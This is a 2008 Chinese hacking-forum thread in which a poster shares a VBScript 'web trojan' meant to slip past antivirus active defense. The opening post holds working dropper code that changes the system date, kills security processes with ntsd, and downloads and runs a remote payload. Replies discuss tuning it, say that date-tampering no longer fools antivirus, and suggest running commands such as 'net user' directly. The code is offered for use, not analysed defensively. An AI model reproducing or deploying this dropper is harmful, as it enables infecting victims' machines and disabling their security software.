Board logo

标题: [讨论]一个延时过主动防御网马 [打印本页]

作者: 2000gaobo    时间: 2008-7-25 01:17     标题: [讨论]一个延时过主动防御网马

[讨论]一个延时过主动防御网马
议题作者:185810581
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

初来报道写个菜菜的一个延时过主动防御网马
秒数代表正常日期几秒后改回,30代表30秒,延时的单位1000代表1秒
on error resume next
Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="杀进程1" or ps.name="杀进程2" or ps.name="杀进程3如此类推" then
a.run "ntsd -c q -p ps.handle",0
end if:next
b = ("下载的马儿保存地址"):c = ("马儿地址")
wscript.sleep 延时
Set d = CreateObject("Microsoft.XMLHTTP")
d.Open "GET",c,0
d.Send()
Set e = CreateObject("ADODB.Stream")
e.Mode = 3
e.Type = 1
e.Open()
e.Write(d.responseBody)
e.SaveToFile b
a.run b
帖子9 精华0 积分31 阅读权限40 性别男 在线时间16 小时 注册时间2007-10-21 最后登录2008-7-22 查看详细资料TOP 让女孩一夜变的更有女人味

kylin
荣誉会员

作者: terry    时间: 2008-7-25 01:17

秒数 改为 %1 可以直接传参
帖子152 精华0 积分3681 阅读权限100 性别男 在线时间1005 小时 注册时间2005-6-27 最后登录2008-7-24 查看详细资料TOP 让女孩一夜变的更有女人味

sudami
大米米

运维管理组

作者: 马自达    时间: 2008-7-25 01:17

这脚本只能当科普用.

你得首先把防止时间被更改的驱动过了~
antiARP,MicroPoint,360的附属产品。。。
都已经用驱动保护系统时间了。你如何搞?

主防不是这样过的~~~WINDOWS内核疯狂爱好者
帖子243 精华6 积分5537 阅读权限150 性别男 在线时间1115 小时 注册时间2007-1-10 最后登录2008-7-24 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

舍我其谁
晶莹剔透§烈日灼然
作者: 沙王    时间: 2008-7-25 01:17

修改时间是不行的啦,瑞星2008,江民等,你一改时间就报。。傻了吧兄弟,这个过时了做最好的自己

帖子9 精华0 积分34 阅读权限40 性别男 来自山东济南 在线时间15 小时 注册时间2007-11-12 最后登录2008-7-21 查看详细资料TOP

明明
晶莹剔透§烈日灼然
作者: 蓝精灵    时间: 2008-7-25 01:17

那楼上的  现在怎么过呢/
帖子5 精华0 积分17 阅读权限40 性别男 在线时间22 小时 注册时间2007-6-2 最后登录2008-1-12 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

shunyuncc
晶莹剔透§烈日灼然
作者: biaofbi    时间: 2008-7-25 01:17

一个延时过主动防御网马?????????

这段代码 可以在网页上执行??
为什么不直接执行

Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide

net user 等
帖子16 精华0 积分62 阅读权限40 在线时间55 小时 注册时间2006-1-4 最后登录2008-6-24 查看详细资料TOP 让女孩一夜变的更有女人味

microalex
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2